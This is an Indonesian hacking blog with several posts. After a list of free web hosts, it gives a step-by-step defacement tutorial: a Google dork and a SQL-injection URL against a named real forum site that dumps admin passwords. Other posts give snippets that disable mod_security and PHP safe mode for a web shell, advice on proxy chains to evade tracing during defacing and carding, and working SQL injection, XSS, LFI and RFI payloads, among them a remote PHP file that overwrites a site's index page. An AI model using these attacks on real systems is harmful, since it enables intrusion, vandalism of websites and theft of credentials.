Sabtu, 03 Maret 2012

Best Free webhosting websites

1 Selengkapnya
1- 000webhost.Com

Features :

500 MB Disk Space, 100 GB Data Transfer
PHP with MySQL Database Support
cPanel Control Panel
Fantastico De Luxe 1-Click Autoinstaller
Website Builder Software

url : http://www.000webhost.com/



2- X10 Hosting

Features :

PHP with MySQL Database Support
cPanel Control Panel
Free subdomain

subdomains for x10 Hosting:

x10.mx
x10.bz
elementfx[dot]com

url : http://www.x10hosting.com



3- Viral Hosts

Features :

PHP with MySQL Database Support
cPanel Control Panel
Free subdomain

url : http://www.viralhosts.com



4- My3gb

Features :

3GB space
30GB bandwidth
2 MySQL Databases
PHP scripting
10MB maximum file size
NO forced ads

url : http://my3gb[dot]com



5- Heloihost

php
asp.net
Ruby on nails
Python
Jsp
Perl
Mysql
PostgreSQL
cPanel

url : http://www.heliohost.org



semoga hostingan free ini bermanfaat ^_^ bagi yang niat belajar :)

deface forum trik lama By Lamerkch

0 Selengkapnya
nih tutorial asal nya aku download video deface dr temen, trus di file itu ad tutor nya, yaudah ku copast aja kesini



langsung ya



Ketik di google

inurl:/forums.asp?iFor=



Pilih target...

Contoh target

http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=17



Hapus angka dibelakang =

Hingga menjadi ini

http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=



Setelah = masukan SQL inject

12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1

1,12+from+users



Hingga menjadi seperti ini

http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users



Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username

Tulisan yg berderet di bawah nama DATED itu adalah passwordnya



Cari username admin & passnya.

Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password

Username : admin

Password : default



Sekarang klik tulisan login yg berada diatas.

Nah..login udah berhasil

Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS"



Isi Subject nya...

Contoh : HACKED BY BLA BLA BLA

lalu masukin script deface HTML nya ke kolom di bawah subject.



Hmm......

Jika ingin menutup full seluruh halaman, pake code berikut

http://pastebin.com/wnjs0mGp

Jangan lupa di edit dulu kataƂ² nya !!!



Trus klik tombol post....

Ok...HTML deface an lo udah masuk...sekarang klik judul postingan yg lo tulis di subject tadi.



ntar jadi nya begini gan

http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/messages.asp?iMsg=557&iFor=16



Salam Kenal Dari Newbie :(

Minggu, 26 Februari 2012

membuat safe Mode ON menjadi Save Mode OFF pada PHP Shell

0 Selengkapnya
haloooo .. kembali lagi bersama saya flazer yang ganteng ini ya
rolling on the floor
 ini ada teman saya yang bernama khalila*sharen yang menanyakan tentang safe mode on menjadi off
ok deh karna saya lagi males banget nulis mending langsung aja deh di baca + di praktekin ya 
pada kali ini saya ingin berbagi tentang merubah safemode ON menjadi OFF pada php shell ..
ada 3 cara yaitu melalui .htaccess , ini.php dan php.ini
oke langsung saja menuju c0de nya ……………

.htaccess 
<IfModule mod_security.c&gt;     SecFilterEngine Off     SecFilterScanPOST Off </IfModule>


ini.php
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"file"sansursansursansur93;);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"ss"sansursansursansur93;);
?>
php.ini
safe_mode = off
exec = On
shell_exec = On
semoga totur ini bermanfaat ya ^_^
salam dari lamer kch ^_^

Menciptakan Proxy Chains

0 Selengkapnya
 wah gak sengaja neh nemu postingan baru dari temen saya :D thanks banget dari om j0ck3r yang sudah share totur nya jadi gk sulit² lagi neh
Proxy Chains,apakah itu??Proxy Chains berarti rantai/rangkaian proxy dimana proxy yang ditentukan saling berhubungan.lha gunannya buat apa??Hem..sebelumnya tahu gak sih arti Proxy atau kegunaan Proxy??Untuk praktisi computer dan keamanan ( baca : hacker ) pastilah paham arti dan kegunaan proxy,Jawaban yang sederhana dan mudah dimengerti bagi orang awam , proxy adalah perantara atau kurir antara IP satu ke IP yang lain. Pengertian mudah IP (Internet Protocol) adalah code atau alamat sedang Proxy bisa kita ibaratkan Pak Pos atau kurir.
Kegunaan proxy:

1. Proxy bisa menyembunyikan identitas IP anda.
2. Mempercepat akses ke suatu website.
3. Dapat digunakan untuk mengakses suatu website atau IP yang diblokir oleh Penyedia ISP atau Penyedia jaringan Internet tertentu (Dengan Proxy Tertentu )
4. Proxy dapat digunakan untuk memblokir akses ke suatu IP atau website ( Dengan Proxy tertentu )
5. Meningkatkan Privacy atau keamanan karena proxy ini akan memfilter cookies yang tidak diinginkan dan tersimpan dalam keadaan ter- encrypsi ( Proxy Tertentu)

Disini kita akan membahas kegunaan Proxy demi kepentingan hacking yaitu menyembunyikan IP kita,lho kenapa mesti disembunyikan??ingat,setiap kita browsing atau mengirimkan permintaan pada sebuah web,IP kita akan tercatat di Log mereka,lha kalau kita melakukan aktifitas yang merugikan ( deface,carding,etc ) tanpa menyembunyikan IP kita lalu dilacak siapa pelakunya??ketahuan dunk Ip kita,tinggal di WHOIS,lalu tanyakan pada Penyedia layanan internet tersebut,jreng..jreng…masuk deh ke terali besi.Biasanya Hacker hanya menggunakan 1 buah Proxy untuk menyamarkan Ip mereka,cara ini cukup mudah akan tetapi tingkat resiko dilacaknya cukup besar,lha kok bisa?? Sekarang kita bila menggunakan Proxy Free yang tersebar di internet,kita tidak tahu apakah server proxy tersebut mencatat kita atau tidak,bila mencatat??wah tinggal dilacak mundur aja kaya gambar dibawah ini,dan ketangkep lah kita…
Dengan menciptakan Proxy Chains,paling tidak kita telah meminimalisasi terlacaknya Ip kita.Gambaran Proxy Chains tu kurang lebihnya kaya gini..
Dengan menggunakan beberapa Proxy,kita telah mempersulit usaha pelacakan kita,lha gimana caranya membuat??pertama-tama siapkan dulu software ShocksChain,download aja di
KLIK DI SINI KK HACKER

Pada saat pertama kali dijalankan,ShocksChain akan membuat Proxy Lokal di komputer kita di port 1080.Lalu kita klik icon Proxy Manager-Update List-Test All untuk memastikan mana saja Proxy Server yang aktif,lalu Klik icon Service ( + ) dan kita pilih proxy mana saja yang akan digunakan,lalu kita klik add di box sebelah kiri...

Bila udah,kita tinggal ubah setting browser kita menggunakan proxy localhost yang diciptakan oleh shocks chain tadi yaitu 127.0.0.1 port 1080...
Untuk memastikannya chek di http://whatismyip.com/ juga cek respon di software sockschain

semoga totur yang saya berikan ini bermanfaat banget ya

sumber : my team

Sabtu, 25 Februari 2012

Dasar Web Hacking (Sql inj, Xss,RFI)

0 Selengkapnya
habis keliling nyari-nyari tutor untuk menambah pengetahuan q yang masih kurang ini, flazer nemuin di slah satu situs dan kali ini gue  rasa membantu untuk  memahami sql injection, RFI, n Xss
kira -kira isinya seperti berikut :
Common Web-Script Vulnerabilities

Dalam bagian ini, saya akan menulis tentang kerentanan dalam server web server-sided kode. Berikut adalah topik yang saya akan meliputi:

* SQL Injection
* XSS (Cross-Site Scripting)
* RFI / LFI (Remote / Local File Include)

SQL Injection
Deskripsi
Injeksi SQL adalah tindakan injeksi Anda sendiri, adat-crafted perintah SQL ke web-script sehingga Anda dapat memanipulasi database dengan cara apapun yang Anda inginkan. Beberapa contoh penggunaan SQL injection: Bypass login verifikasi, menambahkan account admin baru, angkat sandi, angkat rincian kartu kredit, dll; Anda dapat mengakses segala sesuatu yang ada di database.

Contoh Rentan Kode - login.php (PHP / MySQL)
Berikut adalah contoh kode login yang rentan
PHP
<?php
$user = $_POST['u'];
$pass = $_POST['p'];

if (!isset($user) || !isset($pass)) {
echo("<form method=post><input type=text name=u value=Username><br /><input type=password name=p value=Password><br /><input type=submit value=Login></form>");
} else {
$sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
$ret = mysql_query($sql);
$ret = mysql_fetch_array($ret);
if ($ret[0] != "") {
echo("Welcome, $user.");
} else {
echo("Incorrect login details.");
}
}
?>

Pada dasarnya apa yang dilakukan kode ini, adalah mengambil username dan password masukan, dan mengambil IP pengguna dari database dalam rangka untuk memeriksa validitas username / password combo.

Pengujian Input Untuk Vulnerability
Hanya membuang " '" ke dalam masukan, dan melihat apakah output kesalahan, jika demikian, mungkin yang disuntikkan. Jika tidak menampilkan apa-apa, mungkin injeksi, dan jika demikian, Anda akan berurusan dengan injeksi SQL buta yang setiap orang bisa mengatakan tidak menyenangkan. Lain, bukan disuntikkan.

Contoh Exploit
Andaikan saja kita mengetahui username admin Administrator dan kami ingin masuk ke rekening. Karena kode tidak menyaring masukan kami, kami dapat memasukkan apa pun yang kita inginkan ke dalam pernyataan, dan hanya membiarkan diri masuk Untuk melakukan hal ini, kami hanya akan menempatkan "Administrator" di dalam kotak nama pengguna, dan " 'OR 1 = 1 -- - "ke dalam kotak password; yang dihasilkan query SQL yang akan dijalankan terhadap database akan" SELECT `IP` FROM `user` WHERE `username` = 'Admin' AND `password =''OR 1 = 1 - '" . Karena "OR 1 = 1", itu akan memiliki kemampuan untuk mengabaikan sandi persyaratan, karena seperti yang kita semua tahu, logika "OR" hanya memerlukan satu pertanyaan untuk menghasilkan benar untuk mencapai sukses, dan sejak 1 selalu sama dengan 1, ia bekerja; yang "-" adalah 'komentar' karakter untuk SQL yang berarti mengabaikan semuanya setelah itu, jika tidak yang terakhir " '" akan merusak sintaks, dan hanya menyebabkan permintaan gagal.

XSS (Cross-Site Scripting)
Deskripsi
Celah ini memungkinkan penyerang masukan untuk dikirim ke korban tidak curiga. Penggunaan utama untuk kerentanan ini adalah mencuri cookie, jika seorang penyerang mencuri cookie Anda, mereka dapat login ke situs apa pun mereka mencuri cookie Anda dari bawah account Anda (biasanya, dan dengan asumsi Anda log in pada saat itu.)

Contoh Rentan Kode - search.php (PHP)

<?php
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo("You searched for $s. There were no results found");
?>

Pengujian Input Untuk Vulnerability
Untuk ini, kita uji dengan melemparkan beberapa HTML ke mesin pencari, seperti "<font color=red> XSS </ font>". Jika situs rentan terhadap XSS, Anda akan melihat sesuatu seperti ini: XSS, lain, itu tidak rentan.

Contoh Kode Exploit (Redirect)
Karena kita berarti, kita ingin mengarahkan korban untuk goatse (tidak terlihat bahwa jika Anda tidak tahu apa itu) dengan menipu mereka untuk mengklik link menunjuk ke "search.php? Search = <script > window.location = 'http://goatse.cz/' </ script> ". Ini akan menampilkan "You searched for <script> window.location = 'http://goatse.cz/' </ script>. Tak ada hasil ditemukan" (HTML) dan dengan asumsi browser target mendukung JS (JavaScript) yang semua browser modern lakukan apabila pengaturan dimatikan, itu akan mengarahkan mereka untuk goatse.

RFI / LFI (Remote / Local File Include)
Deskripsi
Celah ini memungkinkan pengguna untuk memasukkan remote atau file lokal, dan memilikinya parsing dan dijalankan pada server lokal.

Contoh Rentan Kode - index.php (PHP)

<?php
$page = $_GET['p'];
if (isset($page)) {
include($page);
} else {
include("home.php");
}
?>


Pengujian Input Untuk Vulnerability
Cobalah mengunjungi "index.php? P = http://www.google.com/"; jika Anda melihat Google, sangat rentan terhadap RFI dan LFI akibatnya. Jika anda tidak tidak rentan terhadap RFI, tetapi masih mungkin rentan terhadap LFI. Dengan asumsi bahwa server yang digunakan * nix, coba melihat "index.php? P = / etc / passwd"; jika Anda melihat file passwd, itu rentan terhadap LFI; lain, itu tidak rentan terhadap RFI atau LFI.

Contoh Exploit
Katakanlah target rentan terhadap RFI dan kami upload kode PHP berikut

<?php
unlink("index.php");
system("echo Hacked > index.php");
?>

dan kemudian kita melihat "index.php? p = http://our.site.com/malicious.php" maka kode berbahaya kita akan dijalankan pada server mereka, dan dengan demikian, situs mereka hanya akan berkata 'Hacked' sekarang . 
 
© Copyright 2011 : Zone Crew
Template dari : Free Blogger Templates | ZonaBlogger.com | Didukung Oleh : Blogger.com